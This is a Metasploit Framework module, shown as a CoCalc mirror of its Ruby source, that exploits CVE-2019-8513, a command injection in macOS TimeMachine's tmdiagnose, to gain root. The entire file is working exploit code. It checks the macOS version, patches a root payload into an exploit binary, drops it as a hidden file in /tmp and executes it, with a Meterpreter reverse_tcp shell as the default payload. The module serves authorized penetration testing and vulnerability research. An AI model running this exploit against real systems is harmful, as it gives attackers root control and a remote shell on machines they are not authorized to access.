Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/local/timemachine_cmd_injection.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Local
7
Rank = ExcellentRanking
8
9
include Msf::Post::File
10
include Msf::Post::OSX::Priv
11
include Msf::Post::OSX::System
12
include Msf::Exploit::EXE
13
include Msf::Exploit::FileDropper
14
15
def initialize(info = {})
16
super(
17
update_info(
18
info,
19
'Name' => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',
20
'Description' => %q{
21
This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in
22
order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers
23
from a command injection vulnerability that can be exploited by creating a
24
specially crafted disk label.
25
26
The tmdiagnose binary uses awk to list every mounted volume, and composes
27
shell commands based on the volume labels. By creating a volume label with the
28
backtick character, we can have our own binary executed with root priviledges.
29
},
30
'License' => MSF_LICENSE,
31
'Author' => [
32
'CodeColorist', # Discovery and exploit
33
'timwr', # Metasploit module
34
],
35
'References' => [
36
['CVE', '2019-8513'],
37
['URL', 'http://web.archive.org/web/20201113192302/https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],
38
['URL', 'https://support.apple.com/en-in/HT209600'],
39
['URL', 'https://github.com/ChiChou/sploits'],
40
],
41
'DefaultTarget' => 0,
42
'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
43
'Targets' => [
44
[ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],
45
[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
46
[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],
47
],
48
'DisclosureDate' => '2019-04-13',
49
'Notes' => {
50
'Reliability' => UNKNOWN_RELIABILITY,
51
'Stability' => UNKNOWN_STABILITY,
52
'SideEffects' => UNKNOWN_SIDE_EFFECTS
53
}
54
)
55
)
56
register_advanced_options [
57
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
58
]
59
end
60
61
def upload_executable_file(filepath, filedata)
62
print_status("Uploading file: '#{filepath}'")
63
write_file(filepath, filedata)
64
chmod(filepath)
65
register_file_for_cleanup(filepath)
66
end
67
68
def check
69
version = Rex::Version.new(get_system_version)
70
if version >= Rex::Version.new('10.14.4')
71
CheckCode::Safe
72
else
73
CheckCode::Appears
74
end
75
end
76
77
def exploit
78
if check != CheckCode::Appears
79
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
80
end
81
82
if is_root?
83
fail_with Failure::BadConfig, 'Session already has root privileges'
84
end
85
86
unless writable? datastore['WritableDir']
87
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
88
end
89
90
exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit"))
91
if target['Arch'] == ARCH_X64
92
root_cmd = payload.encoded
93
else
94
root_cmd = payload.raw
95
if target['Arch'] == ARCH_PYTHON
96
root_cmd = "echo \"#{root_cmd}\" | python"
97
end
98
root_cmd = "CMD:#{root_cmd}"
99
end
100
if root_cmd.length > 1024
101
fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
102
end
103
104
placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
105
exploit_data[placeholder_index, root_cmd.length] = root_cmd
106
107
exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
108
upload_executable_file(exploit_file, exploit_data)
109
110
print_status("Executing exploit '#{exploit_file}'")
111
result = cmd_exec(exploit_file)
112
print_status("Exploit result:\n#{result}")
113
end
114
end
115
116